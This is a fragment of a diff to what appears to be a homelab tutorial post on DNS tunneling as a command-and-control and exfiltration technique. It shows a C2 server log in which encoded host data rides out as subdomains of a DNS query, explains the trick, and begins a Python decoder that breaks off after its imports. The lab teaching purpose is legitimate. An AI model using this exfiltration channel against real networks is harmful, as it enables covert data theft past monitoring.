jenkaj-lab/jenkaj-lab/content/posts/mitre/techniques/command_and_control/application_layer_protocol/DNS Tunneling.md

     pass
 ```

-When running the script you should get output like below:
+When the script above is run your C2 server should receive a log that looks similar to this:
 ```
 client @0x77042c1ca578 192.168.1.182#55499 (YWxleAo=.Ni4xNC4xMC1hcmNoMS0xCg==.homelab.local): query: YWxleAo=.Ni4xNC4xMC1hcmNoMS0xCg==.homelab.local IN TXT +E(0) (192.168.1.155)
 ```

-Now that we've confirmed that works it's time to make a python script on the server to strip out the query and decode it.
+Notice how the query contains two obfuscated strings; `YWxleAo=` and `Ni4xNC4xMC1hcmNoMS0xCg==`.
+What we've done here is queried `homelab.local` but included the exfiltrated and encoded data as two additional subdomains.
+In doing this the C2 server has managed to log the query despite the fact that the domain does not exist.
+This is exactly how we will harness this exfiltration technique - we just need to make a listener that can decode the logs for us.

+To do
 ``` python
 import re
 import time